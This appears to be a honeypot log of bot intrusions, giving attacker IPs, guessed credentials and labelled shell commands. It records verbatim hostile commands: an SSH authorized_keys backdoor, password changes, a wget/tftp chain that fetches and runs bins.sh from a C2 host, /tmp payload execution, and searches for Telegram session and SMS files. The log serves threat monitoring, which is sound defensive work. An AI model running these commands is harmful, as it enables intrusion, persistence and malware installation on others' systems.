$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 kimchi_root_4 (58.226.230.112) — Buk-gu, South Korea · 1 session · 9 cmds

2026-04-17 20:01 EDT · as root/root

network mapping → OS/kernel identification → CPU profiling

$ /ip cloud print

$ ifconfig

↳ network mapping

$ uname -a

↳ OS/kernel identification

$ cat /proc/cpuinfo

↳ CPU profiling

$ ps | grep '[Mm]iner'

$ ps -ef | grep '[Mm]iner'

$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

$ locate D877F783D5D3EF8Cs

$ echo Hi | cat -n

🎭 ghost_sol_3 (41.59.86.232) — Dar es Salaam, Tanzania · 1 session · 2 cmds

2026-04-17 18:35 EDT · as oracle/oracle22!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 gouda_sol_2 (2.57.122.208) — Amsterdam, The Netherlands · 866 sessions · 866 cmds

2026-02-28 05:34 EST · as sol/123, sol/sol, solana/solana

Ran uname 1047x across 1047 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×866

↳ obfuscated system check

🎭 shadow_sol (5.54.77.87) — Pátrai, Greece · 1 session · 1 cmd

2026-04-17 18:24 EDT · as root/123456

echo

$ echo -e "\x6F\x6B"

🎭 phantom_root_27 (213.6.203.226) — Gaza, Palestine · 1 session · 2 cmds

2026-04-17 16:50 EDT · as oracle/oracle30!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 specter_root_39 (23.97.62.114) — Singapore, Singapore · 3 sessions · 3 cmds

2026-04-17 15:30 EDT · as root/123456, root/12345678, root/admin123

history snooping → hostname discovery

$ history | tail -5 ×2

↳ history snooping

$ hostname

↳ hostname discovery

🎭 phantom_root_28 (163.61.156.121) — Gulshan, Bangladesh · 1 session · 1 cmd

2026-04-17 15:09 EDT · as admin/admin

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 star_sol (92.118.39.62) — Dallas, United States · 1340 sessions · 1340 cmds

2026-02-28 03:32 EST · as sol/123, sol/123456, sol/sol

Ran uname 1727x across 1727 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×1340

↳ obfuscated system check

🎭 phantom_root_17 (201.249.192.30) — Caracas, Venezuela · 1 session · 2 cmds

2026-04-17 13:53 EDT · as oracle/11111111

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 tulip_root_7 (51.163.39.213) — Amsterdam, Netherlands · 2 sessions · 22 cmds

2026-03-18 18:18 EDT · as docker/docker123, oracle/oracle@2026

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×2

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×2

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "docker123\nndvhZx8h2O6n\nndvhZx8h2O6n"|passwd|bash

$ Enter new UNIX password:

$ echo "docker123\nndvhZx8h2O6n\nndvhZx8h2O6n\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 eagle_sol_2 (92.118.39.76) — Dallas, United States · 195 sessions · 195 cmds

2026-02-28 11:30 EST · as sol/123, sol/sol, solana/solana

Ran uname 201x across 201 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×195

↳ obfuscated system check

🎭 phantom_root_29 (188.132.232.70) — Istanbul, Turkey · 2 sessions · 8 cmds

2026-04-17 10:33 EDT · as root/1234, root/admin123

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×2

$ uname -s -v -n -m 2 > /dev/null ×2

$ uname -m 2 > /dev/null ×2

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×2

🎭 gouda_root_7 (89.190.156.34) — Amsterdam, Netherlands · 5 sessions · 5 cmds

2026-04-16 20:09 EDT · as root/123456

payload download from C2

$ cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://89.190.156.34/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 89.190.156.34 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 89.190.156.34; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 89.190.156.34 ftp1.sh ftp1.sh; sh ftp1.sh tftp1.sh tftp2.sh ftp1.sh ×5

↳ payload download from C2

🎭 silk_root_12 (120.48.113.47) — Beijing, China · 2 sessions · 2 cmds

2026-04-12 08:36 EDT · as root/password

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m ×2

🎭 tulip_sol_2 (45.148.10.240) — Amsterdam, Netherlands · 722 sessions · 722 cmds

2026-02-28 04:53 EST · as admin/admin123, eth/eth, sol/123

Ran uname 900x across 900 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×722

↳ obfuscated system check

🎭 lantern_root_11 (47.98.254.52) — Hangzhou, China · 1 session · 1 cmd

2026-04-17 04:12 EDT · as deploy/deploy123

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 wok_root_18 (8.130.16.117) — Beijing, China · 1 session · 1 cmd

2026-04-17 04:11 EDT · as postgres/postgres

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 jade_root_6 (39.105.218.153) — Beijing, China · 1 session · 1 cmd

2026-04-17 03:48 EDT · as oracle/Oracle@1234

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 dragon_root_13 (47.113.205.91) — Shenzhen, China · 1 session · 1 cmd

2026-04-17 03:39 EDT · as pi/raspberry

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 silk_root_13 (106.75.8.160) — Yangpu, China · 1 session · 1 cmd

2026-04-17 02:42 EDT · as root/password

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 wok_root_19 (39.104.16.66) — Beijing, China · 1 session · 1 cmd

2026-04-17 01:16 EDT · as root/admin123

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 ghost_root_52 (188.130.154.20) — Helsinki, Finland · 1 session · 20 cmds

2026-04-17 00:21 EDT · as test/test

chattr -ia .ssh → rm -rf .ssh → mkdir .ssh → passwd test → cat /proc/cpuinfo → free -m → ls -lh $(which ls) → crontab -l → uname -m → top

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "test\nUPJp69aF0Bev\nUPJp69aF0Bev"|passwd|bash

$ Enter new UNIX password:

$ echo "test\nUPJp69aF0Bev\nUPJp69aF0Bev\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 shadow_root_28 (187.174.238.116) — Álvaro Obregón, Mexico · 1 session · 2 cmds

2026-04-17 00:09 EDT · as oracle/oracle12345

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 lotus_root_8 (165.101.251.150) — Mumbai, India · 1 session · 1 cmd

2026-04-16 23:30 EDT · as root/root

hostname discovery

$ hostname

↳ hostname discovery

🎭 liberty_sol (92.118.39.72) — Dallas, United States · 215 sessions · 215 cmds

2026-02-28 15:01 EST · as miner/miner, sol/123, sol/sol

Ran uname 150x across 150 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×215

↳ obfuscated system check

🎭 liberty_root_12 (129.146.128.34) — Phoenix, United States · 1 session · 9 cmds

2026-04-16 20:57 EDT · as root/root

network mapping → OS/kernel identification → CPU profiling

$ /ip cloud print

$ ifconfig

↳ network mapping

$ uname -a

↳ OS/kernel identification

$ cat /proc/cpuinfo

↳ CPU profiling

$ ps | grep '[Mm]iner'

$ ps -ef | grep '[Mm]iner'

$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

$ locate D877F783D5D3EF8Cs

$ echo Hi | cat -n

🎭 phantom_root_30 (68.178.160.148) — Singapore, Singapore · 1 session · 1 cmd

2026-04-16 18:35 EDT · as oracle/oracle1234

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 cipher_pi (58.152.192.195) — Tseung Kwan O, Hong Kong · 2 sessions · 3 cmds

2026-04-16 18:21 EDT · as pi/raspberry

make executable → execute payload → execute from /tmp

$ cd /tmp && chmod +x bSqMc657 && bash -c ./bSqMc657

↳ make executable

$ ./bSqMc657

↳ execute payload

$ scp -t /tmp/bSqMc657

↳ execute from /tmp

🎭 bibimbap_root_3 (130.162.132.75) — Seoul, South Korea · 1 session · 2 cmds

2026-04-16 18:03 EDT · as oracle/Oracle10!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 shadow_root_7 (114.34.106.146) — New Taipei City, Taiwan · 2 sessions · 22 cmds

2026-04-15 15:18 EDT · as oracle/Oracle03, tomcat/tomcat123

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×2

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×2

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "tomcat123\nt3a3TDLbKzzl\nt3a3TDLbKzzl"|passwd|bash

$ Enter new UNIX password:

$ echo "tomcat123\nt3a3TDLbKzzl\nt3a3TDLbKzzl\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 wok_root_20 (120.77.153.229) — Shenzhen, China · 1 session · 1 cmd

2026-04-16 15:53 EDT · as user/user

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 bike_sol_2 (2.57.122.96) — Amsterdam, The Netherlands · 601 sessions · 601 cmds

2026-02-28 03:38 EST · as eth/eth, firedancer/firedancer, jito/jito

Ran uname 433x across 433 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×601

↳ obfuscated system check

🎭 lantern_root_12 (218.22.202.18) — Hefei, China · 1 session · 1 cmd

2026-04-16 13:15 EDT · as root/password

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 phantom_root_13 (156.238.252.133) — Hong Kong, Hong Kong · 2 sessions · 4 cmds

2026-04-16 13:00 EDT · as oracle/oracle11!, oracle/oracle17

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×2

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×2

↳ SSH key persistence

🎭 bike_root_7 (103.45.247.79) — Amsterdam, Netherlands · 1 session · 2 cmds

2026-04-16 12:57 EDT · as oracle/Passw0rd@123

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 specter_db (201.184.50.251) — Bogotá, Colombia · 1 session · 2 cmds

2026-04-16 12:40 EDT · as oracle/oracle17

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 chai_root_9 (49.207.241.24) — Bengaluru, India · 1 session · 2 cmds

2026-04-16 12:39 EDT · as oracle/oracle17

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 dragon_root_14 (59.36.233.74) — Guangzhou, China · 2 sessions · 2 cmds

2026-04-08 12:40 EDT · as guest/guest, root/1234

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a ×2

↳ OS/kernel identification

🎭 cipher_root_45 (41.86.34.139) — Victoria, Seychelles · 1 session · 20 cmds

2026-04-16 09:16 EDT · as ubuntu/ubuntu

chattr -ia .ssh → rm -rf .ssh → mkdir .ssh → passwd ubuntu/qhgu2R0vrhFR → cat /proc/cpuinfo | grep name | wc -l → cat /proc/cpuinfo | grep model | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9}' → free -m | grep Mem

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "ubuntu\nqhgu2R0vrhFR\nqhgu2R0vrhFR"|passwd|bash

$ Enter new UNIX password:

$ echo "ubuntu\nqhgu2R0vrhFR\nqhgu2R0vrhFR\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 shadow_root_29 (103.163.116.84) — Dhaka, Bangladesh · 1 session · 20 cmds

2026-04-16 09:04 EDT · as ubuntu/ubuntu

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

